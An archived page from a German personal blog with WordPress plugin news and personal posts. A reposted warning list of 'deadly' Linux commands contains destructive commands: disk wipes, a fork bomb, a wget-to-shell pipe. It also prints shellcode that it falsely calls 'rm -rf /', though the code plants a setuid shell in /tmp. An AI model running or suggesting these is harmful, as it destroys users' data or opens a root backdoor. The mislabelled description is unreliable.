Archiv

Archiv für November, 2008

Xxternal-RSS Version 0.1.7 verfügbar, kann Google Reader Feeds

29. November 2008

Die neue Version von Xxternal-RSS ist verfügbar. Wie immer über das Wordpress PlugIn Verzeichnis oder die Wordpress Update funktion installierbar.

Auf einigen Seiten ist mir aufgefallen das die Wordpress Benutzer das PlugIn installiert haben aber auf einzelnen Seiten oder in der Sidebar war nur die Meldungen “Keine Meldungen vorhanden.”. Das weisst entweder auf einen Fehler beim Eintragen, fehlerhafter Feed Link oder einen anderen Fehler.

Fehler beim Eintragen konnte immer schnell behoben werden und anschliessend funktionierte das PlugIn wie gewünscht. Auf ein paar Seiten war jedoch die Feed URL ok und auch wurde im Text oder Widget alles richtig eingetragen. Es war Google schuld, es werden im Google-Reader keine richtigen RSS-Feeds angeboten sondern verkrüppelte Google dinger. Damit kämpfen auch alle anderen RSS PlugIns.

Xxternal-RSS hat heute gelernt auch mit Google Feeds umzugehen. Danke auch noch mal an dieser Stelle an Christoph Vogt von bastelbude.com, bei ihm ist es mir aufgefallen und er hat mir verraten das es ein Google Feed ist und diese nirgenwo funktionieren und für die Google Feed Links.

Allgemeines, Software, Web, Xxternal-RSS , , , , , , , , ,

WordPress 2.6 Easter Egg

27. November 2008

In Wordpress 2.6 und in der Beta von WordPress 2.7 ist ein Osterei versteckt.

  1. Ein Post bearbeiten.
  2. Ganz nach unten scrollen zu den Revisionen und die letzte Revision anklicken.
  3. Auf der nächsten Seite auch nach ganz unten scrollen und zweimal die gleiche Revision auswählen.
  4. Anschliessend auf “Compare Revisions” klicken und The Matrix has you..

Danger !
Self-comparison detected.
Initiating infinite loop eschewal protocol.
Self destruct in… 3
2
1
Wake up, Donncha…
The Matrix has you…
Don’t let this happen again. Go Back.

Get the Flash Player to see the wordTube Media Player.

Allgemeines, Fun, Software, Web , , , , , , ,

Geniales Tattoo

26. November 2008
Geniales Tattoo

Geniales Tattoo

Viele Tattoos sehen ja scheisse aus aber dieses ist mal eine super Idee.

Allgemeines , , ,

WordPress 2.6.5 Update

26. November 2008

WordPress 2.6.5 is immediately available and fixes one security problem and three bugs. We recommend everyone upgrade to this release.

The security issue is an XSS exploit discovered by Jeremias Reith that fortunately only affects IP-based virtual servers running on Apache 2.x. If you are interested only in the security fix, copy wp-includes/feed.php and wp-includes/version.php from the 2.6.5 release package.

2.6.5 contains three other small fixes in addition to the XSS fix. The first prevents accidentally saving post meta information to a revision. The second prevents XML-RPC from fetching incorrect post types. The third adds some user ID sanitization during bulk delete requests. For a list of changed files, consult the full changeset between 2.6.3 and 2.6.5.

Quelle: Wordpress.org

Allgemeines, Sicherheit, Software, Web , , ,

The 7 Deadly Linux Commands

25. November 2008
If you are new to Linux, chances are you will meet a stupid person perhaps in a forum or chat room that can trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario from happening, I have here a list of deadly Linux commands that you should avoid.

1. Code:


rm -rf /
This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(”.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipeout all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){:|:&};:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn’t exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

Gefunden: hier

Fun, Linux , ,

inktomisearch.com bzw. inktomi.com nicht mehr erreichbar.

25. November 2008

Viele werden sich freuen. Immer wieder ist in Foren zu lesen gewesen das Inktomisearch Internetseiten durchsucht für Yahoo und andere. Das ist meistens gewünscht aber bei vielen war zuerkennen das Inktomisearch beim crawlen von Internetseiten die robot.txt, die Suchmaschinen vorschreibt welche Seiten durchsucht werden dürfen und welche nicht, einfach ingoniert.

Seit heute können überhaupt keine Hostnames mehr aufgelöst werden:


#> for i in $(cat inktomisearch.ips); do host $i; done
Host cdev1000.inktomisearch.com not found: 3(NXDOMAIN)
Host cdev1001.inktomisearch.com not found: 3(NXDOMAIN)
Host j3103.inktomisearch.com not found: 3(NXDOMAIN)
Host j3105.inktomisearch.com not found: 3(NXDOMAIN)
Host j3106.inktomisearch.com not found: 3(NXDOMAIN)
Host j3108.inktomisearch.com not found: 3(NXDOMAIN)
Host j3110.inktomisearch.com not found: 3(NXDOMAIN)
...

Entweder wird es jetzt ruhiger in den Logfiles und der aktuelle Yahoo Slurp verhält sich ja etwas angenehmer oder Yahoo bzw. Inktomisearch ist hier ein Fehler unterlaufen und alles was im DNS eingetragen war ist durch einen Fehler für 1-2 Tage einfach mal kurz weg. ;-)

Allgemeines

Wordpress PlugIn Xxternal-RSS 0.1.4 direkt hinterher

18. November 2008

Die aktuelle Version 0.1.4 von Xxternal-RSS ist online. In der Version 0.1.3 hatte sich ein Parse Error eingeschlichen, der beim testen nicht aufgefallen ist. Erst nach beim Automatischem Update und dem reaktivieren durch Wordpress war er zusehen. Es könnte auch beim einspielen vom Patch geschehen sein.

Version: 0.1.4

  • fix parse error

Software, Web, Xxternal-RSS , , , , ,

Wordpress PlugIn Xxternal-RSS 0.1.3 mit Widget

18. November 2008

Die aktuelle Version 0.1.3 von Xxternal-RSS ist online. In der neuen Version ist jetzt auch ein Sidebar Widget enthalten. Aktuell nimmt es nur den Standard RSS-Feed der im Adminbereich hinterlegt ist. In Zukunft können mehrere Feeds hinterlegt werden.

Version: 0.1.3
==============

* NEW: add sidebar widget
* add first steps for 0.1.4 (compact|extend)-Tags
* add changelog
* running tests in Wordpress 2.6.3 and 2.7 Beta 3

Allgemeines, Software, Web, Xxternal-RSS , , , , ,

Rattenbabys 19. und 20. Tag

6. November 2008

Die Bilder von heute und gestern sind jetzt online. Beide Gallerien sind auch im Album hinzugefügt.

Ratten, Rattengallerie , , , ,

Ratte: Atze beim spielen.

4. November 2008

free video player & video platform - interactive video, online video solution: video player, video editor - kaltura
wordpress video - wordpress plugin for integrated video on video blogs, and video tools

Ratten , , , ,